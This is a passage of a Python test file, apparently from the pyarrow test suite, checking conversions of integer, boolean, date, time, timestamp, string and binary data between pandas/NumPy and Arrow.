                        'byte', 'ubyte', 'short', 'ushort', 'intc', 'uintc',
                        'int_', 'uint', 'longlong', 'ulonglong']
        for dtype in numpy_dtypes:
            data[dtype] = np.arange(12, dtype=dtype)
        df = pd.DataFrame(data)
        _check_pandas_roundtrip(df)
        # Do the same with pa.array()
        # (for some reason, it doesn't use the same code paths at all)
        for np_arr in data.values():
            arr = pa.array(np_arr)
            assert arr.to_pylist() == np_arr.tolist()

    def test_integer_byteorder(self):
        """Non-native byte order raises NotImplementedError."""
        # Byteswapped arrays are not supported yet
        int_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8']
        for dt in int_dtypes:
            for order in '=<>':
                data = np.array([1, 2, 42], dtype=order + dt)
                for np_arr in (data, data[::2]):
                    if data.dtype.isnative:
                        arr = pa.array(data)
                        assert arr.to_pylist() == data.tolist()
                    else:
                        with pytest.raises(NotImplementedError):
                            arr = pa.array(data)

    def test_integer_with_nulls(self):
        """Integer columns with nulls are upcast to float64 in pandas."""
        # pandas requires upcast to float dtype
        int_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8']
        num_values = 100
        null_mask = np.random.randint(0, 10, size=num_values) < 3
        expected_cols = []
        arrays = []
        for name in int_dtypes:
            values = np.random.randint(0, 100, size=num_values)
            arr = pa.array(values, mask=null_mask)
            arrays.append(arr)
            expected = values.astype('f8')
            expected[null_mask] = np.nan
            expected_cols.append(expected)
        ex_frame = pd.DataFrame(dict(zip(int_dtypes, expected_cols)),
                                columns=int_dtypes)
        table = pa.Table.from_arrays(arrays, int_dtypes)
        result = table.to_pandas()
        tm.assert_frame_equal(result, ex_frame)

    def test_array_from_pandas_type_cast(self):
        """An explicit target type casts the input array on conversion."""
        arr = np.arange(10, dtype='int64')
        target_type = pa.int8()
        result = pa.array(arr, type=target_type)
        expected = pa.array(arr.astype('int8'))
        assert result.equals(expected)

    def test_boolean_no_nulls(self):
        """Boolean columns without nulls round-trip with exact schema."""
        num_values = 100
        np.random.seed(0)
        df = pd.DataFrame({'bools': np.random.randn(num_values) > 0})
        field = pa.field('bools', pa.bool_())
        schema = pa.schema([field])
        _check_pandas_roundtrip(df, expected_schema=schema)

    def test_boolean_nulls(self):
        """Boolean columns with nulls come back as object dtype."""
        # pandas requires upcast to object dtype
        num_values = 100
        np.random.seed(0)
        mask = np.random.randint(0, 10, size=num_values) < 3
        values = np.random.randint(0, 10, size=num_values) < 5
        arr = pa.array(values, mask=mask)
        expected = values.astype(object)
        expected[mask] = None
        field = pa.field('bools', pa.bool_())
        schema = pa.schema([field])
        ex_frame = pd.DataFrame({'bools': expected})
        table = pa.Table.from_arrays([arr], ['bools'])
        assert table.schema.equals(schema)
        result = table.to_pandas()
        tm.assert_frame_equal(result, ex_frame)

    def test_boolean_to_int(self):
        """dtype=bool values can be converted to int64."""
        # test from dtype=bool
        s = pd.Series([True, True, False, True, True] * 2)
        expected = pd.Series([1, 1, 0, 1, 1] * 2)
        _check_array_roundtrip(s, expected=expected, type=pa.int64())

    def test_boolean_objects_to_int(self):
        """Object-dtype booleans are rejected when an int type is requested."""
        # test from dtype=object
        s = pd.Series([True, True, False, True, True] * 2, dtype=object)
        expected = pd.Series([1, 1, 0, 1, 1] * 2)
        expected_msg = 'Expected integer, got bool'
        with pytest.raises(pa.ArrowTypeError, match=expected_msg):
            _check_array_roundtrip(s, expected=expected, type=pa.int64())

    def test_boolean_nulls_to_float(self):
        """Object-dtype booleans with a None can convert to float64."""
        # test from dtype=object
        s = pd.Series([True, True, False, None, True] * 2)
        expected = pd.Series([1.0, 1.0, 0.0, None, 1.0] * 2)
        _check_array_roundtrip(s, expected=expected, type=pa.float64())

    def test_boolean_multiple_columns(self):
        """Strided boolean data from a 2D block converts correctly."""
        # ARROW-6325 (multiple columns resulting in strided conversion)
        df = pd.DataFrame(np.ones((3, 2), dtype='bool'), columns=['a', 'b'])
        _check_pandas_roundtrip(df)

    def test_float_object_nulls(self):
        """Object-dtype floats with None round-trip as float64."""
        arr = np.array([None, 1.5, np.float64(3.5)] * 5, dtype=object)
        df = pd.DataFrame({'floats': arr})
        expected = pd.DataFrame({'floats': pd.to_numeric(arr)})
        field = pa.field('floats', pa.float64())
        schema = pa.schema([field])
        _check_pandas_roundtrip(df, expected=expected,
                                expected_schema=schema)

    def test_float_with_null_as_integer(self):
        """NaN-bearing floats convert to every integer type, NaN -> null."""
        # ARROW-2298
        s = pd.Series([np.nan, 1., 2., np.nan])
        types = [pa.int8(), pa.int16(), pa.int32(), pa.int64(),
                 pa.uint8(), pa.uint16(), pa.uint32(), pa.uint64()]
        for ty in types:
            result = pa.array(s, type=ty)
            expected = pa.array([None, 1, 2, None], type=ty)
            assert result.equals(expected)
            df = pd.DataFrame({'has_nulls': s})
            schema = pa.schema([pa.field('has_nulls', ty)])
            result = pa.Table.from_pandas(df, schema=schema,
                                          preserve_index=False)
            assert result[0].chunk(0).equals(expected)

    def test_int_object_nulls(self):
        """Object-dtype ints with None round-trip as int64."""
        arr = np.array([None, 1, np.int64(3)] * 5, dtype=object)
        df = pd.DataFrame({'ints': arr})
        expected = pd.DataFrame({'ints': pd.to_numeric(arr)})
        field = pa.field('ints', pa.int64())
        schema = pa.schema([field])
        _check_pandas_roundtrip(df, expected=expected,
                                expected_schema=schema)

    def test_boolean_object_nulls(self):
        """Object-dtype booleans with None round-trip as bool."""
        arr = np.array([False, None, True] * 100, dtype=object)
        df = pd.DataFrame({'bools': arr})
        field = pa.field('bools', pa.bool_())
        schema = pa.schema([field])
        _check_pandas_roundtrip(df, expected_schema=schema)

    def test_all_nulls_cast_numeric(self):
        """An all-null object array can be cast to any numeric type."""
        arr = np.array([None], dtype=object)

        def _check_type(t):
            # the requested type wins and the single value stays null
            a2 = pa.array(arr, type=t)
            assert a2.type == t
            assert a2[0].as_py() is None

        _check_type(pa.int32())
        _check_type(pa.float64())

    def test_half_floats_from_numpy(self):
        """float16 NaN stays NaN, or becomes null with from_pandas=True."""
        arr = np.array([1.5, np.nan], dtype=np.float16)
        a = pa.array(arr, type=pa.float16())
        x, y = a.to_pylist()
        assert isinstance(x, np.float16)
        assert x == 1.5
        assert isinstance(y, np.float16)
        assert np.isnan(y)
        a = pa.array(arr, type=pa.float16(), from_pandas=True)
        x, y = a.to_pylist()
        assert isinstance(x, np.float16)
        assert x == 1.5
        assert y is None
@pytest.mark.parametrize('dtype',
                         ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8'])
def test_array_integer_object_nulls_option(dtype):
    """integer_object_nulls=True keeps ints as objects with None for nulls."""
    num_values = 100
    null_mask = np.random.randint(0, 10, size=num_values) < 3
    values = np.random.randint(0, 100, size=num_values, dtype=dtype)
    array = pa.array(values, mask=null_mask)
    if null_mask.any():
        expected = values.astype('O')
        expected[null_mask] = None
    else:
        expected = values
    result = array.to_pandas(integer_object_nulls=True)
    np.testing.assert_equal(result, expected)
@pytest.mark.parametrize('dtype',
                         ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8'])
def test_table_integer_object_nulls_option(dtype):
    """Table-level integer_object_nulls=True yields object columns."""
    num_values = 100
    null_mask = np.random.randint(0, 10, size=num_values) < 3
    values = np.random.randint(0, 100, size=num_values, dtype=dtype)
    array = pa.array(values, mask=null_mask)
    if null_mask.any():
        expected = values.astype('O')
        expected[null_mask] = None
    else:
        expected = values
    expected = pd.DataFrame({dtype: expected})
    table = pa.Table.from_arrays([array], [dtype])
    result = table.to_pandas(integer_object_nulls=True)
    tm.assert_frame_equal(result, expected)
class TestConvertDateTimeLikeTypes(object):
    """
    Conversion tests for datetime- and timestamp-like types (date64, etc.).
    """

    def test_timestamps_notimezone_no_nulls(self):
        """Naive nanosecond timestamps round-trip with exact schema."""
        df = pd.DataFrame({
            'datetime64': np.array([
                '2007-07-13T01:23:34.123456789',
                '2006-01-13T12:34:56.432539784',
                '2010-08-13T05:46:57.437699912'],
                dtype='datetime64[ns]')
        })
        field = pa.field('datetime64', pa.timestamp('ns'))
        schema = pa.schema([field])
        _check_pandas_roundtrip(
            df,
            expected_schema=schema,
        )

    def test_timestamps_notimezone_nulls(self):
        """Naive nanosecond timestamps with a null round-trip."""
        df = pd.DataFrame({
            'datetime64': np.array([
                '2007-07-13T01:23:34.123456789',
                None,
                '2010-08-13T05:46:57.437699912'],
                dtype='datetime64[ns]')
        })
        field = pa.field('datetime64', pa.timestamp('ns'))
        schema = pa.schema([field])
        _check_pandas_roundtrip(
            df,
            expected_schema=schema,
        )

    def test_timestamps_with_timezone(self):
        """tz-aware timestamps (ms and ns, with nulls) round-trip."""
        df = pd.DataFrame({
            'datetime64': np.array([
                '2007-07-13T01:23:34.123',
                '2006-01-13T12:34:56.432',
                '2010-08-13T05:46:57.437'],
                dtype='datetime64[ms]')
        })
        df['datetime64'] = df['datetime64'].dt.tz_localize('US/Eastern')
        _check_pandas_roundtrip(df)
        _check_series_roundtrip(df['datetime64'])
        # drop-in a null and ns instead of ms
        df = pd.DataFrame({
            'datetime64': np.array([
                '2007-07-13T01:23:34.123456789',
                None,
                '2006-01-13T12:34:56.432539784',
                '2010-08-13T05:46:57.437699912'],
                dtype='datetime64[ns]')
        })
        df['datetime64'] = df['datetime64'].dt.tz_localize('US/Eastern')
        _check_pandas_roundtrip(df)

    def test_python_datetime(self):
        """Object-dtype datetime.datetime values become a TimestampArray."""
        # ARROW-2106
        date_array = [datetime.today() + timedelta(days=x) for x in range(10)]
        df = pd.DataFrame({
            'datetime': pd.Series(date_array, dtype=object)
        })
        table = pa.Table.from_pandas(df)
        assert isinstance(table[0].chunk(0), pa.TimestampArray)
        result = table.to_pandas()
        expected_df = pd.DataFrame({
            'datetime': date_array
        })
        tm.assert_frame_equal(expected_df, result)

    def test_python_datetime_with_pytz_tzinfo(self):
        """datetimes tagged with pytz tzinfo objects round-trip."""
        for tz in [pytz.utc, pytz.timezone('US/Eastern'), pytz.FixedOffset(1)]:
            values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz)]
            df = pd.DataFrame({'datetime': values})
            _check_pandas_roundtrip(df)

    @h.given(st.none() | tzst.timezones())
    def test_python_datetime_with_pytz_timezone(self, tz):
        """Property test: any hypothesis-generated (or no) tz round-trips."""
        values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz)]
        df = pd.DataFrame({'datetime': values})
        _check_pandas_roundtrip(df)

    @pytest.mark.skipif(six.PY2, reason='datetime.timezone is available since '
                                        'python version 3.2')
    def test_python_datetime_with_timezone_tzinfo(self):
        """stdlib datetime.timezone offsets map onto pytz.FixedOffset."""
        from datetime import timezone
        values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=pytz.utc)]
        df = pd.DataFrame({'datetime': values})
        _check_pandas_roundtrip(df)
        # datetime.timezone is going to be pytz.FixedOffset
        hours = 1
        tz_timezone = timezone(timedelta(hours=hours))
        tz_pytz = pytz.FixedOffset(hours * 60)
        values = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz_timezone)]
        values_exp = [datetime(2018, 1, 1, 12, 23, 45, tzinfo=tz_pytz)]
        df = pd.DataFrame({'datetime': values})
        df_exp = pd.DataFrame({'datetime': values_exp})
        _check_pandas_roundtrip(df, expected=df_exp)

    def test_python_datetime_subclass(self):
        """datetime subclasses are accepted and normalized on return."""
        class MyDatetime(datetime):
            # see https://github.com/pandas-dev/pandas/issues/21142
            nanosecond = 0.0

        date_array = [MyDatetime(2000, 1, 1, 1, 1, 1)]
        df = pd.DataFrame({"datetime": pd.Series(date_array, dtype=object)})
        table = pa.Table.from_pandas(df)
        assert isinstance(table[0].chunk(0), pa.TimestampArray)
        result = table.to_pandas()
        expected_df = pd.DataFrame({"datetime": date_array})
        # https://github.com/pandas-dev/pandas/issues/21142
        expected_df["datetime"] = pd.to_datetime(expected_df["datetime"])
        tm.assert_frame_equal(expected_df, result)

    def test_python_date_subclass(self):
        """date subclasses are stored as a Date32Array."""
        class MyDate(date):
            pass

        date_array = [MyDate(2000, 1, 1)]
        df = pd.DataFrame({"date": pd.Series(date_array, dtype=object)})
        table = pa.Table.from_pandas(df)
        assert isinstance(table[0].chunk(0), pa.Date32Array)
        result = table.to_pandas()
        expected_df = pd.DataFrame(
            {"date": np.array([date(2000, 1, 1)], dtype=object)}
        )
        tm.assert_frame_equal(expected_df, result)

    def test_datetime64_to_date32(self):
        """A date series converted with explicit date32 matches a cast."""
        # ARROW-1718
        arr = pa.array([date(2017, 10, 23), None])
        c = pa.chunked_array([arr])
        s = c.to_pandas()
        arr2 = pa.Array.from_pandas(s, type=pa.date32())
        assert arr2.equals(arr.cast('date32'))

    @pytest.mark.parametrize('mask', [
        None,
        np.array([True, False, False]),
    ])
    def test_pandas_datetime_to_date64(self, mask):
        """Midnight-only datetimes convert losslessly to date64."""
        s = pd.to_datetime([
            '2018-05-10T00:00:00',
            '2018-05-11T00:00:00',
            '2018-05-12T00:00:00',
        ])
        arr = pa.Array.from_pandas(s, type=pa.date64(), mask=mask)
        data = np.array([
            date(2018, 5, 10),
            date(2018, 5, 11),
            date(2018, 5, 12)
        ])
        expected = pa.array(data, mask=mask, type=pa.date64())
        assert arr.equals(expected)

    @pytest.mark.parametrize('mask', [
        None,
        np.array([True, False, False])
    ])
    def test_pandas_datetime_to_date64_failures(self, mask):
        """Datetimes with intraday components cannot become date64."""
        s = pd.to_datetime([
            '2018-05-10T10:24:01',
            '2018-05-11T10:24:01',
            '2018-05-12T10:24:01',
        ])
        expected_msg = 'Timestamp value had non-zero intraday milliseconds'
        with pytest.raises(pa.ArrowInvalid, match=expected_msg):
            pa.Array.from_pandas(s, type=pa.date64(), mask=mask)

    def test_array_types_date_as_object(self):
        """Date arrays return objects by default, datetime64[ns] on request."""
        data = [date(2000, 1, 1),
                None,
                date(1970, 1, 1),
                date(2040, 2, 26)]
        expected_d = np.array(['2000-01-01', None, '1970-01-01',
                               '2040-02-26'], dtype='datetime64[D]')
        expected_ns = np.array(['2000-01-01', None, '1970-01-01',
                                '2040-02-26'], dtype='datetime64[ns]')
        objects = [pa.array(data),
                   pa.chunked_array([data])]
        for obj in objects:
            result = obj.to_pandas()
            expected_obj = expected_d.astype(object)
            assert result.dtype == expected_obj.dtype
            npt.assert_array_equal(result, expected_obj)
            result = obj.to_pandas(date_as_object=False)
            assert result.dtype == expected_ns.dtype
            npt.assert_array_equal(result, expected_ns)

    def test_table_convert_date_as_object(self):
        """Table-level date_as_object toggles object vs datetime64 output."""
        df = pd.DataFrame({
            'date': [date(2000, 1, 1),
                     None,
                     date(1970, 1, 1),
                     date(2040, 2, 26)]})
        table = pa.Table.from_pandas(df, preserve_index=False)
        df_datetime = table.to_pandas(date_as_object=False)
        df_object = table.to_pandas()
        tm.assert_frame_equal(df.astype('datetime64[ns]'), df_datetime,
                              check_dtype=True)
        tm.assert_frame_equal(df, df_object, check_dtype=True)

    def test_date_infer(self):
        """Object-dtype date values are inferred as date32."""
        df = pd.DataFrame({
            'date': [date(2000, 1, 1),
                     None,
                     date(1970, 1, 1),
                     date(2040, 2, 26)]})
        table = pa.Table.from_pandas(df, preserve_index=False)
        field = pa.field('date', pa.date32())
        # schema's metadata is generated by from_pandas conversion
        expected_schema = pa.schema([field], metadata=table.schema.metadata)
        assert table.schema.equals(expected_schema)
        result = table.to_pandas()
        tm.assert_frame_equal(result, df)

    def test_date_mask(self):
        """A mask nulls out the masked entries of a datetime64[D] array."""
        arr = np.array([date(2017, 4, 3), date(2017, 4, 4)],
                       dtype='datetime64[D]')
        mask = [True, False]
        result = pa.array(arr, mask=np.array(mask))
        expected = np.array([None, date(2017, 4, 4)], dtype='datetime64[D]')
        expected = pa.array(expected, from_pandas=True)
        assert expected.equals(result)

    def test_date_objects_typed(self):
        """Object dates convert to date32/date64 and back as expected."""
        arr = np.array([
            date(2017, 4, 3),
            None,
            date(2017, 4, 4),
            date(2017, 4, 5)], dtype=object)
        arr_i4 = np.array([17259, -1, 17260, 17261], dtype='int32')
        arr_i8 = arr_i4.astype('int64') * 86400000
        mask = np.array([False, True, False, False])
        t32 = pa.date32()
        t64 = pa.date64()
        a32 = pa.array(arr, type=t32)
        a64 = pa.array(arr, type=t64)
        a32_expected = pa.array(arr_i4, mask=mask, type=t32)
        a64_expected = pa.array(arr_i8, mask=mask, type=t64)
        assert a32.equals(a32_expected)
        assert a64.equals(a64_expected)
        # Test converting back to pandas
        colnames = ['date32', 'date64']
        table = pa.Table.from_arrays([a32, a64], colnames)
        ex_values = (np.array(['2017-04-03', '2017-04-04', '2017-04-04',
                               '2017-04-05'],
                              dtype='datetime64[D]'))
        ex_values[1] = pd.NaT.value
        ex_datetime64ns = ex_values.astype('datetime64[ns]')
        expected_pandas = pd.DataFrame({'date32': ex_datetime64ns,
                                        'date64': ex_datetime64ns},
                                       columns=colnames)
        table_pandas = table.to_pandas(date_as_object=False)
        tm.assert_frame_equal(table_pandas, expected_pandas)
        table_pandas_objects = table.to_pandas()
        ex_objects = ex_values.astype('object')
        expected_pandas_objects = pd.DataFrame({'date32': ex_objects,
                                                'date64': ex_objects},
                                               columns=colnames)
        tm.assert_frame_equal(table_pandas_objects,
                              expected_pandas_objects)

    def test_dates_from_integers(self):
        """Raw integer days / milliseconds map onto date32 / date64."""
        t1 = pa.date32()
        t2 = pa.date64()
        arr = np.array([17259, 17260, 17261], dtype='int32')
        arr2 = arr.astype('int64') * 86400000
        a1 = pa.array(arr, type=t1)
        a2 = pa.array(arr2, type=t2)
        expected = date(2017, 4, 3)
        assert a1[0].as_py() == expected
        assert a2[0].as_py() == expected

    def test_pytime_from_pandas(self):
        """datetime.time objects and int64 microseconds map to time types."""
        pytimes = [time(1, 2, 3, 1356),
                   time(4, 5, 6, 1356)]
        # microseconds
        t1 = pa.time64('us')
        aobjs = np.array(pytimes + [None], dtype=object)
        parr = pa.array(aobjs)
        assert parr.type == t1
        assert parr[0].as_py() == pytimes[0]
        assert parr[1].as_py() == pytimes[1]
        assert parr[2] is pa.NA
        # DataFrame
        df = pd.DataFrame({'times': aobjs})
        batch = pa.RecordBatch.from_pandas(df)
        assert batch[0].equals(parr)
        # Test ndarray of int64 values
        arr = np.array([_pytime_to_micros(v) for v in pytimes],
                       dtype='int64')
        a1 = pa.array(arr, type=pa.time64('us'))
        assert a1[0].as_py() == pytimes[0]
        a2 = pa.array(arr * 1000, type=pa.time64('ns'))
        assert a2[0].as_py() == pytimes[0]
        a3 = pa.array((arr / 1000).astype('i4'),
                      type=pa.time32('ms'))
        assert a3[0].as_py() == pytimes[0].replace(microsecond=1000)
        a4 = pa.array((arr / 1000000).astype('i4'),
                      type=pa.time32('s'))
        assert a4[0].as_py() == pytimes[0].replace(microsecond=0)

    def test_arrow_time_to_pandas(self):
        """All four Arrow time types convert with the expected precision."""
        pytimes = [time(1, 2, 3, 1356),
                   time(4, 5, 6, 1356),
                   time(0, 0, 0)]
        expected = np.array(pytimes[:2] + [None])
        expected_ms = np.array([x.replace(microsecond=1000)
                                for x in pytimes[:2]] +
                               [None])
        expected_s = np.array([x.replace(microsecond=0)
                               for x in pytimes[:2]] +
                              [None])
        # NOTE: the original computed this identical array twice in a row;
        # the redundant duplicate assignment was removed.
        arr = np.array([_pytime_to_micros(v) for v in pytimes],
                       dtype='int64')
        null_mask = np.array([False, False, True], dtype=bool)
        a1 = pa.array(arr, mask=null_mask, type=pa.time64('us'))
        a2 = pa.array(arr * 1000, mask=null_mask,
                      type=pa.time64('ns'))
        a3 = pa.array((arr / 1000).astype('i4'), mask=null_mask,
                      type=pa.time32('ms'))
        a4 = pa.array((arr / 1000000).astype('i4'), mask=null_mask,
                      type=pa.time32('s'))
        names = ['time64[us]', 'time64[ns]', 'time32[ms]', 'time32[s]']
        batch = pa.RecordBatch.from_arrays([a1, a2, a3, a4], names)
        for arr, expected_values in [(a1, expected),
                                     (a2, expected),
                                     (a3, expected_ms),
                                     (a4, expected_s)]:
            result_pandas = arr.to_pandas()
            assert (result_pandas.values == expected_values).all()
        df = batch.to_pandas()
        expected_df = pd.DataFrame({'time64[us]': expected,
                                    'time64[ns]': expected,
                                    'time32[ms]': expected_ms,
                                    'time32[s]': expected_s},
                                   columns=names)
        tm.assert_frame_equal(df, expected_df)

    def test_numpy_datetime64_columns(self):
        """datetime64 arrays of every time unit round-trip."""
        datetime64_ns = np.array([
            '2007-07-13T01:23:34.123456789',
            None,
            '2006-01-13T12:34:56.432539784',
            '2010-08-13T05:46:57.437699912'],
            dtype='datetime64[ns]')
        _check_array_from_pandas_roundtrip(datetime64_ns)
        datetime64_us = np.array([
            '2007-07-13T01:23:34.123456',
            None,
            '2006-01-13T12:34:56.432539',
            '2010-08-13T05:46:57.437699'],
            dtype='datetime64[us]')
        _check_array_from_pandas_roundtrip(datetime64_us)
        datetime64_ms = np.array([
            '2007-07-13T01:23:34.123',
            None,
            '2006-01-13T12:34:56.432',
            '2010-08-13T05:46:57.437'],
            dtype='datetime64[ms]')
        _check_array_from_pandas_roundtrip(datetime64_ms)
        datetime64_s = np.array([
            '2007-07-13T01:23:34',
            None,
            '2006-01-13T12:34:56',
            '2010-08-13T05:46:57'],
            dtype='datetime64[s]')
        _check_array_from_pandas_roundtrip(datetime64_s)

    @pytest.mark.parametrize('dtype', [pa.date32(), pa.date64()])
    def test_numpy_datetime64_day_unit(self, dtype):
        """datetime64[D] arrays convert to both date types."""
        datetime64_d = np.array([
            '2007-07-13',
            None,
            '2006-01-15',
            '2010-08-19'],
            dtype='datetime64[D]')
        _check_array_from_pandas_roundtrip(datetime64_d, type=dtype)

    def test_array_from_pandas_date_with_mask(self):
        """An explicit mask nulls out the masked entries of a date Series."""
        m = np.array([True, False, True])
        data = pd.Series([
            date(1990, 1, 1),
            date(1991, 1, 1),
            date(1992, 1, 1)
        ])
        result = pa.Array.from_pandas(data, mask=m)
        expected = pd.Series([None, date(1991, 1, 1), None])
        assert pa.Array.from_pandas(expected).equals(result)

    def test_fixed_offset_timezone(self):
        """Fixed-offset timezones with NaT round-trip and serialize."""
        df = pd.DataFrame({
            'a': [
                pd.Timestamp('2012-11-11 00:00:00+01:00'),
                pd.NaT
            ]
        })
        _check_pandas_roundtrip(df)
        _check_serialize_components_roundtrip(df)

    def test_timedeltas_no_nulls(self):
        """timedelta64[ns] columns map onto duration('ns')."""
        df = pd.DataFrame({
            'timedelta64': np.array([0, 3600000000000, 7200000000000],
                                    dtype='timedelta64[ns]')
        })
        field = pa.field('timedelta64', pa.duration('ns'))
        schema = pa.schema([field])
        _check_pandas_roundtrip(
            df,
            expected_schema=schema,
        )

    def test_timedeltas_nulls(self):
        """timedelta64[ns] columns with nulls map onto duration('ns')."""
        df = pd.DataFrame({
            'timedelta64': np.array([0, None, 7200000000000],
                                    dtype='timedelta64[ns]')
        })
        field = pa.field('timedelta64', pa.duration('ns'))
        schema = pa.schema([field])
        _check_pandas_roundtrip(
            df,
            expected_schema=schema,
        )
# ----------------------------------------------------------------------
# Conversion tests for string and binary types.
class TestConvertStringLikeTypes(object):
    """
    Conversion tests for string and binary types (string, binary,
    fixed-size binary, large_string/large_binary, categorical output).
    """

    def test_pandas_unicode(self):
        # Unicode strings (with None/NaN nulls) roundtrip as pa.string().
        repeats = 1000
        values = [u'foo', None, u'bar', u'mañana', np.nan]
        df = pd.DataFrame({'strings': values * repeats})
        field = pa.field('strings', pa.string())
        schema = pa.schema([field])

        _check_pandas_roundtrip(df, expected_schema=schema)

    def test_bytes_to_binary(self):
        # A column mixing str/bytes/bytearray is inferred as binary, and
        # everything comes back as bytes on the pandas side.
        values = [u'qux', b'foo', None, bytearray(b'barz'), 'qux', np.nan]
        df = pd.DataFrame({'strings': values})

        table = pa.Table.from_pandas(df)
        assert table[0].type == pa.binary()

        values2 = [b'qux', b'foo', None, b'barz', b'qux', np.nan]
        expected = pd.DataFrame({'strings': values2})
        _check_pandas_roundtrip(df, expected)

    @pytest.mark.large_memory
    def test_bytes_exceed_2gb(self):
        v1 = b'x' * 100000000
        v2 = b'x' * 147483646

        # ARROW-2227, hit exactly 2GB on the nose
        df = pd.DataFrame({
            'strings': [v1] * 20 + [v2] + ['x'] * 20
        })
        arr = pa.array(df['strings'])
        assert isinstance(arr, pa.ChunkedArray)
        assert arr.num_chunks == 2
        arr = None  # release before building the Table below

        table = pa.Table.from_pandas(df)
        assert table[0].num_chunks == 2

    def test_fixed_size_bytes(self):
        # binary(3) accepts only 3-byte values (or null).
        values = [b'foo', None, bytearray(b'bar'), None, None, b'hey']
        df = pd.DataFrame({'strings': values})
        schema = pa.schema([pa.field('strings', pa.binary(3))])
        table = pa.Table.from_pandas(df, schema=schema)
        assert table.schema[0].type == schema[0].type
        assert table.schema[0].name == schema[0].name
        result = table.to_pandas()
        tm.assert_frame_equal(result, df)

    def test_fixed_size_bytes_does_not_accept_varying_lengths(self):
        # b'ba' is only 2 bytes, which must be rejected by binary(3).
        values = [b'foo', None, b'ba', None, None, b'hey']
        df = pd.DataFrame({'strings': values})
        schema = pa.schema([pa.field('strings', pa.binary(3))])
        with pytest.raises(pa.ArrowInvalid):
            pa.Table.from_pandas(df, schema=schema)

    def test_variable_size_bytes(self):
        s = pd.Series([b'123', b'', b'a', None])
        _check_series_roundtrip(s, type_=pa.binary())

    def test_binary_from_bytearray(self):
        s = pd.Series([bytearray(b'123'), bytearray(b''), bytearray(b'a'),
                       None])
        # Explicitly set type
        _check_series_roundtrip(s, type_=pa.binary())
        # Infer type from bytearrays
        _check_series_roundtrip(s, expected_pa_type=pa.binary())

    def test_large_binary(self):
        s = pd.Series([b'123', b'', b'a', None])
        _check_series_roundtrip(s, type_=pa.large_binary())
        df = pd.DataFrame({'a': s})
        _check_pandas_roundtrip(
            df, schema=pa.schema([('a', pa.large_binary())]))

    def test_large_string(self):
        s = pd.Series(['123', '', 'a', None])
        _check_series_roundtrip(s, type_=pa.large_string())
        df = pd.DataFrame({'a': s})
        _check_pandas_roundtrip(
            df, schema=pa.schema([('a', pa.large_string())]))

    def test_table_empty_str(self):
        values = ['', '', '', '', '']
        df = pd.DataFrame({'strings': values})
        field = pa.field('strings', pa.string())
        schema = pa.schema([field])
        table = pa.Table.from_pandas(df, schema=schema)

        # plain object-dtype strings
        result1 = table.to_pandas(strings_to_categorical=False)
        expected1 = pd.DataFrame({'strings': values})
        tm.assert_frame_equal(result1, expected1, check_dtype=True)

        # categorical output requested
        result2 = table.to_pandas(strings_to_categorical=True)
        expected2 = pd.DataFrame({'strings': pd.Categorical(values)})
        tm.assert_frame_equal(result2, expected2, check_dtype=True)

    def test_selective_categoricals(self):
        # `categories` accepts both lists and tuples of column names;
        # empty containers mean "no categorical conversion".
        values = ['', '', '', '', '']
        df = pd.DataFrame({'strings': values})
        field = pa.field('strings', pa.string())
        schema = pa.schema([field])
        table = pa.Table.from_pandas(df, schema=schema)
        expected_str = pd.DataFrame({'strings': values})
        expected_cat = pd.DataFrame({'strings': pd.Categorical(values)})

        result1 = table.to_pandas(categories=['strings'])
        tm.assert_frame_equal(result1, expected_cat, check_dtype=True)

        result2 = table.to_pandas(categories=[])
        tm.assert_frame_equal(result2, expected_str, check_dtype=True)

        result3 = table.to_pandas(categories=('strings',))
        tm.assert_frame_equal(result3, expected_cat, check_dtype=True)

        result4 = table.to_pandas(categories=tuple())
        tm.assert_frame_equal(result4, expected_str, check_dtype=True)

    def test_to_pandas_categorical_zero_length(self):
        # ARROW-3586
        array = pa.array([], type=pa.int32())
        table = pa.Table.from_arrays(arrays=[array], names=['col'])
        # This would segfault under 0.11.0
        table.to_pandas(categories=['col'])

    def test_to_pandas_categories_already_dictionary(self):
        # Showed up in ARROW-6434, ARROW-6435: requesting categories on a
        # column that is already dictionary-encoded must be a no-op.
        array = pa.array(['foo', 'foo', 'foo', 'bar']).dictionary_encode()
        table = pa.Table.from_arrays(arrays=[array], names=['col'])
        result = table.to_pandas(categories=['col'])
        assert table.to_pandas().equals(result)

    def test_table_str_to_categorical_without_na(self):
        values = ['a', 'a', 'b', 'b', 'c']
        df = pd.DataFrame({'strings': values})
        field = pa.field('strings', pa.string())
        schema = pa.schema([field])
        table = pa.Table.from_pandas(df, schema=schema)

        result = table.to_pandas(strings_to_categorical=True)
        expected = pd.DataFrame({'strings': pd.Categorical(values)})
        tm.assert_frame_equal(result, expected, check_dtype=True)

        # Categorical conversion requires a copy, so zero-copy must fail.
        with pytest.raises(pa.ArrowInvalid):
            table.to_pandas(strings_to_categorical=True,
                            zero_copy_only=True)

    def test_table_str_to_categorical_with_na(self):
        values = [None, 'a', 'b', np.nan]
        df = pd.DataFrame({'strings': values})
        field = pa.field('strings', pa.string())
        schema = pa.schema([field])
        table = pa.Table.from_pandas(df, schema=schema)

        result = table.to_pandas(strings_to_categorical=True)
        expected = pd.DataFrame({'strings': pd.Categorical(values)})
        tm.assert_frame_equal(result, expected, check_dtype=True)

        with pytest.raises(pa.ArrowInvalid):
            table.to_pandas(strings_to_categorical=True,
                            zero_copy_only=True)

    # Regression test for ARROW-2101
    def test_array_of_bytes_to_strings(self):
        converted = pa.array(np.array([b'x'], dtype=object), pa.string())
        assert converted.type == pa.string()

    # Make sure that if an ndarray of bytes is passed to the array
    # constructor and the type is string, it will fail if those bytes
    # cannot be converted to utf-8
    def test_array_of_bytes_to_strings_bad_data(self):
        with pytest.raises(
                pa.lib.ArrowInvalid,
                match="was not a utf8 string"):
            pa.array(np.array([b'\x80\x81'], dtype=object), pa.string())

    def test_numpy_string_array_to_fixed_size_binary(self):
        arr = np.array([b'foo', b'bar', b'baz'], dtype='|S3')

        converted = pa.array(arr, type=pa.binary(3))
        expected = pa.array(list(arr), type=pa.binary(3))
        assert converted.equals(expected)

        mask = np.array([True, False, True])
